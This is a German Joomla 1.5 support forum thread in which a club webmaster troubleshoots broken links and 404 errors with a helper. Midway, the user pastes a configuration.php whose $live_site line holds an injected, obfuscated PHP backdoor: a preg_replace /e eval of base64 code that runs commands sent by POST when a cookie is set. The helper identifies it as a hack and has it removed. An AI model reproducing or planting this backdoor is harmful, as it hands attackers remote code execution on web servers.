-
Suchmaschinenfreundliche URLs direkt in DB abschalten, Layout defek & Fehler 404
Hallo,
Wie kann ich die Suchmaschinenfreundliche URLs direkt in der Datenbank oder einer Konfigurationsdatei abschsalten, da das Backend nicht richtig funktioniert?
Hier eine etwas genaue Problembeschreibung,
Ich versuche jetzt seit über 2 Wochen unsere Vereinshomepage wieder zum laufen zu bekommen. Es werden keine Bilder angezeigt und die Links funktionieren nicht. Siehe http://otfs.de.
Ich vermute das das Problem durch Einstellung Suchmaschinenfreundliche URLs auf Ja verursacht wird.
Die Seite hat Monatelang ohne Problem mit den Suchmaschinenfreundlichen URLs funktioniert. Die Probleme sind aufgetreten ohne das wir etwas an der Seite geändert haben.
Wenn ich mich als Admin anmelde kommt diese Meldung:
404 - Komponente nicht gefunden!
Die Seite kann nicht angezeigt werden, weil:
1. Ein veraltetes Lesezeichen
2. Eine Suchmaschine hat einen veralteten Index der Website
3. Eine falsche Adresse
4. Kein Zugriff auf diese Seite!
5. Die angefragte Quelle wurde nicht gefunden!
6. Während der Anfrage ist ein Fehler aufgetreten!
Bitte eine der folgenden Seiten ausprobieren:
* Startseite
Bei Problemen ist der Administrator dieser Website zuständig.
Komponente nicht gefunden!
Wenn ich nochmals http://www.otfs.de/joomla/administrator eingebe komme ich ins Backend kann kann dort auch den Haken bei Suchmaschinenfreundliche URLs auf nein setzen, aber die Links zum Abspeichern usw. Funktionieren alle nicht man kann in keinem Menü etwas ändern.
Wie kann ich die Suchmaschinenfreundliche URLs direkt in der Datenbank oder einer Konfigurationsdatei abschalten, da das Backend nicht richtig funktioniert?
Ich freue mich über jede Hilfe
Marc
-
-
Wohnt hier
einfach die configuration.php per FTP öffnen und die drei einstellungen auf "0" ändern.
ausserdem die .htaccess in htaccess.txt umbenennen , wenn diese vorhanden ist.
-
Erhielt Danksagungen von:
-
Danke für die schnelle Antwort,
Im Backend sind die 3 Einstellungen jetzt auf nein gesetzt. Leider hat es also nichts gebracht das Frontend und Backend sind noch genauso felerhaft, die einzige Anderung ist, das ich im Frontend jetzt diese Meldung bekomme wenn ich einen Link anklicke:
Error 404!
/.+/esi%5C
File Not Found!
Muss ich noch irgendwas machen um die Seite zu aktualisieren oder wird sofort auf SOE Freundliche Links = Aus umgeschaltet?
Oder Kann es sein, das das Problem wo anders liegt?
Danke
Geändert von Marc-1980 (09.05.2011 um 21:58 Uhr)
-
-
Wohnt hier
Das Problem scheint woanders zu liegen.
Stimmen die Pfade in der configuration.php ?
Welche Joomla Version ist das ?
Welche php Version hat der Server ?
Die Links zu deinen BIldern sehen komisch aus ... /.+/ als unterordner.....
das muss irgendwo herkommen !
-
-
Die Joomla Version ist: 1.5.22 wenn ich mich nicht täusche
Php Version ist: 5 laut Provider Wspace.org
Verzeichnisse:
in der configuration.php hab ich folgendes gefunden:
var $log_path = '';
var $tmp_path = '/var/www/virtual/otfs.de/phptmp/';
var $live_site ='\';function __construct() { preg_replace(\"/.+/esi\",\"\\x65\\x76\\x61\\x6C\\x28\\x62\\x61\\x73\\ x65\\x36\\x34\\x5F\\x64\\x65\\x63\\x6F\\x64\\x65\\ x28\'aWYgKCFlbXB0eSgkX0NPT0tJRVsndiddKSBhbmQgJF9DT 09LSUVbJ3YnXT09J2QnKXtpZiAoIWVtcHR5KCRfUE9TVFsnYyd dKSkgeyAkZD1iYXNlNjRfZGVjb2RlKHN0cl9yZXBsYWNlKCcgJ ywnKycsJF9QT1NUWydjJ10pKTtpZigkZCkgZXZhbCgkZCk7fQ0 KZWNobyAnPG5hbWU9Yz48L3RleHRhcmVhPic7ZXhpdDt9\'\\x 29\\x29\\x3B\",\'1\');}#://';# '';
var $force_ssl = '0';
-
-
Wohnt hier
was ist denn der Eintrag bei $live_site ???????????
nimm das mal raus ...
var $lives_site='';
Nachtrag: sieht fast so aus wie .. gehacked ...
-
-
Jetzt geht gar nichts mehr
Parse error: syntax error, unexpected '"' in /var/www/virtual/otfs.de/htdocs/joomla/configuration.php on line 20
Diese Meldung kommt beim Aufrugfen der Seite:
-
-
Wohnt hier
das sind zwei einzelne ' .... kein Anführungszeichen "
wie bei $log_path='';
-
-
Genial, die Hauptseite im Frontent Funktioniert wieder, Leider kommen die Fehler noch bei den Links.
-
-
Hab die htaccess.txt in .htaccess und die Suchmaschienenfreundlichen Links im Backend wieder aktiviert, Läuft jetzt alles wieder.
Es sind nur noch komische Punkte vor einigen Worten z.B bei Wer ist online: •Wir haben• •3 Gäste• •online•.
Dies Punkte waren vorher nicht.
Kann das Wirklich ein Hacker gewesen sein?
Hatte ein Extra langes sicheres Passwort angelegt. Was kann ich noch verbessern?
Vielen Dankl für die Super kompetente Unterstützung aruttkamp.
-